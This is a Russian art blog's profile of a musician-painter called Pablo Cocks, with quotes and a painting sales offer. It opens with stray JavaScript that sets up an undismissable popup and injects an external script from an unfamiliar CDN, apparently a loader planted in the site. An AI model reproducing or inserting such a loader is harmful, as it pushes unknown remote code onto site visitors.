, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Художник Pablo Cocks

Автор: Дмитрий Алмазов | 16 Сен 2012

Художник-музыкант Pablo CocksPablo Cocks - творческий псевдоним, довольно известного и талантливого музыканта... 2011 год... "Карма-Бар". Только тогда я впервые узнал то, что на самом деле существуют люди, талант которых просто не имеет границ и подражать им - это большая привилегия. В 2011 году Pablo Cocks познакомился со мной. То есть. Мы познакомились с этим талантливым музыкантом. Все произошло внезапно. Мы были молоды, и, как все, подрабатывали. Мы с Пашей на тот момент подрабатывали в клубе барменами. В сроки общения мы узнали друг о друге то, чем мы занимаемся, а именно музыкой.

Долгие разговоры об аранжировке, долгие разговоры о пространственном звучании, и, в итоге - наша первая репетиция вместе... Вы просто не представляете, каково мне было играть вместе с саксофонистом. Это человек, который может подстроить свой инструмент под любое музыкальное направление...

Pablo Cocks - человек три в одном. Эксклюзивный музыкант, который дает надежды на музыкальное будущее. Креативный фотограф, который может ваш образ воплотить в фантазию. И, облачно эйфорийный художник, который с помощью музыки и искусства, может возродить новое существование... Все-таки я вернусь к нашей репетицие... Вы когда-нибудь слушали Даб Степ с живым саксофоном? Я на сто процентов уверен, что - нет!!! Pablo Cocks предложил мне, на тот момент немыслимое... Электронно сыграть даб-степ, но а в его обязанности входили ноты, ноты, включающие в себя звучание живого саксофона... Поверьте, Друзья, это была просто фантастика... На данный момент в музыкальных направлениях нет никакого разнообразия... Люди пишут то, что позволяют им возможности, а не идеи, и это самое печальное. Но не суть. Суть в том, что , Pablo Cocks, он открыл мне глаза на музыкальные жанры, которых не существовало... А вы готовы носить носки год не стирая их? Я думаю нет... Так же и в идеализме Pablo Cocks.

Согласитесь, однообразие как в музыке, так и в бытовых условиях просто приводит к скуке. Pablo Cocks, он же открыл новое музыкальное направление не смотря на всех. А разве правильно идти за всеми? Нет. Я пишу о нем ломанными словами, смысл предложений, стоящих до и после вы не уловите, но идею пространственных, таинственных звуков, иллюзионно написанных шедевров, и, грамотно подобранных образов, вы узнаете только тогда, когда ощутите мир искусства творческой деятельности вместе с Pablo Cocks. Если вы действительно цените творческие таланты, то мой совет... Pablo Cocks - это человек, с которым может сравниться любой, но идея подвластна только гениям!

Constantine frods

"Творчество у Паши бурное эгоистичное. Он всем своим нутром пытается доказать, что он не такой как все.  В людях ценит сумасшествие. Любит сиреневый цвет. Принадлежит к холодному типу внешности. Обладает потрясающей улыбкой и практически абсолютным слухом. Творит искусство ради искусство, что несомненно, заслуживает похвалы. Обожает сливочное мороженное и ненавидит имбирь. Понятие не имею, откуда он черпает вдохновение, но воображение у него, точно, бешенное."

Его девушка.

«Я окончил только школу и горжусь тем, что многие, чей уровень такой же, не смогли развить мозг» .

«Я не люблю когда меня называют гением» .

Вообще, многому в этом плане я обязан своей девушке. Например, рисовать я начал в тот самый день, когда впервые увидел её.

С картинами Без названия или  "3940" и Абстрактная подсознательная живопись Pablo Cocks Вы можете купить написав нам на странице контакты.

Темы: Художник, продвижение художника | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress